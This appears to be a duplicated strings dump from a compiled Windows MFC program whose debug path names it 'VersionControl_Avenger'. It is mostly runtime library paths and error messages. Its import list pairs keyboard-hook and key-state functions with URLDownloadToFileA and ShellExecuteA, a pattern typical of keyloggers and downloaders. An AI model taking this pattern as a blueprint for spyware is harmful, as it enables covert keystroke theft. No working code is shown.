f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmultipaneframewnd.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpanecontainer.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpanecontainer.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtabbedpane.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtabbedpane.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxtabbedpane.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxtabbedpane.h
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxautohidebutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxautohidebutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpanecontainermanager.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpanecontainermanager.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxoutlookbar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxoutlookbar.cpp
%sMFCOutlookBar-%d%x
%sMFCOutlookBar-%d%x
%sMFCOutlookBar-%d
%sMFCOutlookBar-%d
?CMDIChildWnd
?CMDIChildWnd
CMDIFrameWnd
CMDIFrameWnd
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winmdi.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winmdi.cpp
Warning: CMDIFrameWnd::OnCreateClient: failed to create MDICLIENT. GetLastError returns 0x%8.8X
Warning: CMDIFrameWnd::OnCreateClient: failed to create MDICLIENT. GetLastError returns 0x%8.8X
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonbar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonbar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxoutlookbartabctrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxoutlookbartabctrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxoutlookbartabctrl.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxoutlookbartabctrl.h
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcolorbar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcolorbar.cpp
Hex={X,X,X}
Hex={X,X,X}
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonpanelmenu.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonpanelmenu.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtaskspaneframewnd.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtaskspaneframewnd.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonquickaccesstoolbar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonquickaccesstoolbar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribboncategory.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribboncategory.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonpanel.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonpanel.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonedit.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonedit.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonpalettegallery.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonpalettegallery.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxribbonpalettegallery.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxribbonpalettegallery.h
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcaptionbar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcaptionbar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxoutlookbarpane.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxoutlookbarpane.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxoutlookbarpanebutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxoutlookbarpanebutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonbutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonbutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxacceleratorkey.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxacceleratorkey.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdragframeimpl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdragframeimpl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxsmartdockingmanager.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxsmartdockingmanager.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxolecntrframewndex.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxolecntrframewndex.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcaptionmenubutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcaptionmenubutton.cpp
CMDIClientAreaWnd
CMDIClientAreaWnd
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmdiclientareawnd.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmdiclientareawnd.cpp
CMDIClientAreaWnd::OnCreate: can't create tabs window
CMDIClientAreaWnd::OnCreate: can't create tabs window
Unknown exception in CMDIClientAreaWnd::SaveState()!
Unknown exception in CMDIClientAreaWnd::SaveState()!
CArchiveException exception in CMDIClientAreaWnd::SaveState()!
CArchiveException exception in CMDIClientAreaWnd::SaveState()!
Memory exception in CMDIClientAreaWnd::SaveState()!
Memory exception in CMDIClientAreaWnd::SaveState()!
%sMDIClientArea-%d
%sMDIClientArea-%d
Unknown exception in CMDIClientAreaWnd::LoadState()!
Unknown exception in CMDIClientAreaWnd::LoadState()!
CArchiveException exception in CMDIClientAreaWnd::LoadState()!
CArchiveException exception in CMDIClientAreaWnd::LoadState()!
Memory exception in CMDIClientAreaWnd::LoadState!
Memory exception in CMDIClientAreaWnd::LoadState!
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewcore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewcore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledoc1.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledoc1.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpreviewviewex.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpreviewviewex.cpp
Malformed Page Description string. Could not get string %d.
Malformed Page Description string. Could not get string %d.
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxfullscreenimpl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxfullscreenimpl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledocip.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledocip.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleipfrm.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleipfrm.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olecli2.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olecli2.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olecli1.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olecli1.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxlistctrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxlistctrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarcomboboxbutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarcomboboxbutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxspinbuttonctrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxspinbuttonctrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcolorpopupmenu.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcolorpopupmenu.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpropertygridtooltipctrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpropertygridtooltipctrl.cpp
?f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxheaderctrl.cpp
?f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxheaderctrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarfontcombobox.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarfontcombobox.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledrop2.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledrop2.cpp
windows
windows
may cause RIPs under debug Windows.
may cause RIPs under debug Windows.
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledobj1.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledobj1.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxmt.inl
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxmt.inl
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin3.inl
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin3.inl
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdockablepaneadapter.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdockablepaneadapter.cpp
%sDockablePaneAdapter-%d%x
%sDockablePaneAdapter-%d%x
%sDockablePaneAdapter-%d
%sDockablePaneAdapter-%d
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxrecentdocksiteinfo.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxrecentdocksiteinfo.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\fileshrd.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\fileshrd.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtooltipctrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtooltipctrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmousemanager.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmousemanager.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dockstat.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dockstat.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarbuttonslistbutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarbuttonslistbutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afximageeditordialog.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afximageeditordialog.cpp
CMFCImageEditorDialog::Copy() error. Error code = %x
CMFCImageEditorDialog::Copy() error. Error code = %x
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afximagepaintarea.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afximagepaintarea.cpp
CMFCToolBarsKeyboardPropertyPage
CMFCToolBarsKeyboardPropertyPage
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarskeyboardpropertypage.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarskeyboardpropertypage.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarslistpropertypage.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarslistpropertypage.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarsoptionspropertypage.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarsoptionspropertypage.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarstoolspropertypage.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarstoolspropertypage.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmousepropertypage.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmousepropertypage.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonkeytip.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonkeytip.cpp
faulted while dumping object at $%p, %u bytes long
faulted while dumping object at $%p, %u bytes long
a %hs object at $%p, %u bytes long
a %hs object at $%p, %u bytes long
an invalid object at $%p, %u bytes long
an invalid object at $%p, %u bytes long
an object at $%p, %u bytes long
an object at $%p, %u bytes long
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dumpinit.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dumpinit.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olemsgf.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olemsgf.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\occlock.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\occlock.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxoutlookbarpaneadapter.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxoutlookbarpaneadapter.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbareditboxbutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbareditboxbutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonlabel.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonlabel.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonbuttonsgroup.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonbuttonsgroup.cpp
ENABLE_KEYS
ENABLE_KEYS
KEYS_MENU
KEYS_MENU
KEYS
KEYS
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl4.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl4.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarslistcheckbox.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarslistcheckbox.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribboncolorbutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribboncolorbutton.cpp
RGB(%d, %d, %d)
RGB(%d, %d, %d)
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcolormenubutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcolormenubutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcolordialog.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcolordialog.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtaskspane.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtaskspane.cpp
%sMFCTasksPane-%d%x
%sMFCTasksPane-%d%x
%sMFCTasksPane-%d
%sMFCTasksPane-%d
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonundobutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonundobutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxsmartdockinghighlighterwnd.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxsmartdockinghighlighterwnd.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxsmartdockingguide.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxsmartdockingguide.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxsmartdockingguide.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxsmartdockingguide.h
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olesvr1.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olesvr1.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewscrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewscrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewprev.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewprev.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgprnt.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgprnt.cpp
m_pd.nCopies =
m_pd.nCopies =
m_pd.nMaxPage =
m_pd.nMaxPage =
m_pd.nMinPage =
m_pd.nMinPage =
m_pd.nToPage =
m_pd.nToPage =
m_pd.nFromPage =
m_pd.nFromPage =
m_pd.Flags =
m_pd.Flags =
m_pd.hDC =
m_pd.hDC =
m_pd.hwndOwner =
m_pd.hwndOwner =
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appprnt.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appprnt.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarscommandslistbox.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarscommandslistbox.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledlgs2.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledlgs2.cpp
m_bz.hTask =
m_bz.hTask =
m_bz.hResource =
m_bz.hResource =
m_bz.lpszTemplate =
m_bz.lpszTemplate =
m_bz.hInstance =
m_bz.hInstance =
m_bz.lCustData =
m_bz.lCustData =
m_bz.lpszCaption =
m_bz.lpszCaption =
m_bz.hWndOwner =
m_bz.hWndOwner =
m_bz.dwFlags =
m_bz.dwFlags =
m_bz.cbStruct =
m_bz.cbStruct =
@f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcolorpickerctrl.cpp
@f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcolorpickerctrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcustomcolorspropertypage.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcustomcolorspropertypage.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxstandardcolorspropertypage.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxstandardcolorspropertypage.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcolorpropertysheet.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcolorpropertysheet.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dcprev.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dcprev.cpp
f:\dd\vctools\crt_bld\self_x86\crt\src\dbgrpt.c
f:\dd\vctools\crt_bld\self_x86\crt\src\dbgrpt.c
f:\dd\vctools\crt_bld\self_x86\crt\src\onexit.c
f:\dd\vctools\crt_bld\self_x86\crt\src\onexit.c
Client hook allocation failure at file %hs line %d.
Client hook allocation failure at file %hs line %d.
Memory allocated at %hs(%d).
Memory allocated at %hs(%d).
Client hook re-allocation failure at file %hs line %d.
Client hook re-allocation failure at file %hs line %d.
HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.
HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.
CRT detected that the application wrote to memory after end of heap buffer.
CRT detected that the application wrote to memory after end of heap buffer.
HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.
HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.
CRT detected that the application wrote to memory before start of heap buffer.
CRT detected that the application wrote to memory before start of heap buffer.
CRT detected that the application wrote to a heap buffer that was freed.
CRT detected that the application wrote to a heap buffer that was freed.
crt block at 0x%p, subtype %x, %Iu bytes long.
crt block at 0x%p, subtype %x, %Iu bytes long.
client block at 0x%p, subtype %x, %Iu bytes long.
client block at 0x%p, subtype %x, %Iu bytes long.
%hs(%d) :
%hs(%d) :
#File Error#(%d) :
#File Error#(%d) :
Data: %s
Data: %s
f:\dd\vctools\crt_bld\self_x86\crt\src\_file.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_file.c
f:\dd\vctools\crt_bld\self_x86\crt\src\setvbuf.c
f:\dd\vctools\crt_bld\self_x86\crt\src\setvbuf.c
_CrtDbgReport: String too long or IO Error
_CrtDbgReport: String too long or IO Error
Debug %s!
Debug %s!
Program: %s%s%s%s%s%s%s%s%s%s%s%s
Program: %s%s%s%s%s%s%s%s%s%s%s%s
f:\dd\vctools\crt_bld\self_x86\crt\src\thread.c
f:\dd\vctools\crt_bld\self_x86\crt\src\thread.c
f:\dd\vctools\crt_bld\self_x86\crt\src\osfinfo.c
f:\dd\vctools\crt_bld\self_x86\crt\src\osfinfo.c
%s(%d) : %s
%s(%d) : %s
_CrtDbgReport: String too long or Invalid characters in String
_CrtDbgReport: String too long or Invalid characters in String
f:\dd\vctools\crt_bld\self_x86\crt\src\mlock.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mlock.c
GetProcessWindowStation
GetProcessWindowStation
f:\dd\vctools\crt_bld\self_x86\crt\src\tidtable.c
f:\dd\vctools\crt_bld\self_x86\crt\src\tidtable.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbctype.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbctype.c
f:\dd\vctools\crt_bld\self_x86\crt\src\ioinit.c
f:\dd\vctools\crt_bld\self_x86\crt\src\ioinit.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_getbuf.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_getbuf.c
f:\dd\vctools\crt_bld\self_x86\crt\src\stdenvp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\stdenvp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\stdargv.c
f:\dd\vctools\crt_bld\self_x86\crt\src\stdargv.c
f:\dd\vctools\crt_bld\self_x86\crt\src\a_env.c
f:\dd\vctools\crt_bld\self_x86\crt\src\a_env.c
f:\dd\vctools\crt_bld\self_x86\crt\src\inithelp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\inithelp.c
Run-Time Check Failure #%d - %s
Run-Time Check Failure #%d - %s
f:\dd\vctools\crt_bld\self_x86\crt\src\input.c
f:\dd\vctools\crt_bld\self_x86\crt\src\input.c
f:\dd\vctools\crt_bld\self_x86\crt\src\output.c
f:\dd\vctools\crt_bld\self_x86\crt\src\output.c
f:\dd\vctools\crt_bld\self_x86\crt\src\setlocal.c
f:\dd\vctools\crt_bld\self_x86\crt\src\setlocal.c
f:\dd\vctools\crt_bld\self_x86\crt\src\stream.c
f:\dd\vctools\crt_bld\self_x86\crt\src\stream.c
f:\dd\vctools\crt_bld\self_x86\crt\src\read.c
f:\dd\vctools\crt_bld\self_x86\crt\src\read.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_sftbuf.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_sftbuf.c
operator
operator
f:\dd\vctools\crt_bld\self_x86\crt\src\inittime.c
f:\dd\vctools\crt_bld\self_x86\crt\src\inittime.c
f:\dd\vctools\crt_bld\self_x86\crt\src\initnum.c
f:\dd\vctools\crt_bld\self_x86\crt\src\initnum.c
f:\dd\vctools\crt_bld\self_x86\crt\src\initmon.c
f:\dd\vctools\crt_bld\self_x86\crt\src\initmon.c
RegCloseKey
RegCloseKey
RegOpenKeyExW
RegOpenKeyExW
f:\dd\vctools\crt_bld\self_x86\crt\src\initctyp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\initctyp.c
portuguese-brazilian
portuguese-brazilian
f:\dd\vctools\crt_bld\self_x86\crt\src\tzset.c
f:\dd\vctools\crt_bld\self_x86\crt\src\tzset.c
f:\dd\vctools\crt_bld\self_x86\crt\src\wtombenv.c
f:\dd\vctools\crt_bld\self_x86\crt\src\wtombenv.c
f:\dd\vctools\crt_bld\self_x86\crt\src\setenv.c
f:\dd\vctools\crt_bld\self_x86\crt\src\setenv.c
%s(%d) :
%s(%d) :
%s_%0x
%s_%0x
f:\dd\vctools\vc7libs\ship\atlmfc\src\atl\atls\atlbase.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\atl\atls\atlbase.cpp
f:\dd\vctools\crt_bld\self_x86\crt\src\_tolower.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_tolower.c
f:\dd\vctools\crt_bld\self_x86\crt\src\locale0.cpp
f:\dd\vctools\crt_bld\self_x86\crt\src\locale0.cpp
f:\dd\vctools\crt_bld\self_x86\crt\src\xutility
f:\dd\vctools\crt_bld\self_x86\crt\src\xutility
f:\dd\vctools\crt_bld\self_x86\crt\src\xmutex.cpp
f:\dd\vctools\crt_bld\self_x86\crt\src\xmutex.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appmodul.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appmodul.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winmain.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winmain.cpp
f:\dd\vctools\crt_bld\self_x86\crt\src\strerror.c
f:\dd\vctools\crt_bld\self_x86\crt\src\strerror.c
Visual C CRT: Not enough memory to complete call to strerror.
Visual C CRT: Not enough memory to complete call to strerror.
Broken pipe
Broken pipe
Inappropriate I/O control operation
Inappropriate I/O control operation
Operation not permitted
Operation not permitted
C:\Users\geniework\Desktop\Avenger\VersionControl_Avenger_15-04-15\Release\VersionControl_Avenger.pdb
C:\Users\geniework\Desktop\Avenger\VersionControl_Avenger_15-04-15\Release\VersionControl_Avenger.pdb
GetCPInfo
GetCPInfo
GetWindowsDirectoryA
GetWindowsDirectoryA
GetProcessHeap
GetProcessHeap
KERNEL32.dll
KERNEL32.dll
CreateDialogIndirectParamA
CreateDialogIndirectParamA
UnhookWindowsHookEx
UnhookWindowsHookEx
SetWindowsHookExA
SetWindowsHookExA
GetKeyState
GetKeyState
GetKeyNameTextA
GetKeyNameTextA
MapVirtualKeyA
MapVirtualKeyA
GetAsyncKeyState
GetAsyncKeyState
GetKeyboardLayout
GetKeyboardLayout
GetKeyboardState
GetKeyboardState
MapVirtualKeyExA
MapVirtualKeyExA
USER32.dll
USER32.dll
GetViewportOrgEx
GetViewportOrgEx
GetViewportExtEx
GetViewportExtEx
SetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
SetViewportExtEx
ScaleViewportExtEx
ScaleViewportExtEx
GDI32.dll
GDI32.dll
MSIMG32.dll
MSIMG32.dll
COMDLG32.dll
COMDLG32.dll
WINSPOOL.DRV
WINSPOOL.DRV
RegOpenKeyExA
RegOpenKeyExA
RegCreateKeyExA
RegCreateKeyExA
RegDeleteKeyA
RegDeleteKeyA
RegEnumKeyA
RegEnumKeyA
RegEnumKeyExA
RegEnumKeyExA
ADVAPI32.dll
ADVAPI32.dll
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
COMCTL32.dll
COMCTL32.dll
SHLWAPI.dll
SHLWAPI.dll
OLEAUT32.dll
OLEAUT32.dll
oledlg.dll
oledlg.dll
URLDownloadToFileA
URLDownloadToFileA
urlmon.dll
urlmon.dll
GdiplusShutdown
GdiplusShutdown
gdiplus.dll
gdiplus.dll
DeleteUrlCacheEntry
DeleteUrlCacheEntry
WININET.dll
WININET.dll
OLEACC.dll
OLEACC.dll
IMM32.dll
IMM32.dll
WINMM.dll
WINMM.dll
.?AVCCmdTarget@@
.?AVCCmdTarget@@
.PAVCOleException@@
.PAVCOleException@@
.PAVCException@@
.PAVCException@@
.PAVCObject@@
.PAVCObject@@
.PAVCMemoryException@@
.PAVCMemoryException@@
.PAVCSimpleException@@
.PAVCSimpleException@@
.PAVCNotSupportedException@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.PAVCInvalidArgException@@
.?AVCNotSupportedException@@
.?AVCNotSupportedException@@
.?AVCCmdUI@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.?AVCTestCmdUI@@
.PAVCUserException@@
.PAVCUserException@@
.PAVCResourceException@@
.PAVCResourceException@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@
.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@
.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@
.PAVCArchiveException@@
.PAVCArchiveException@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDV12@PBD@@
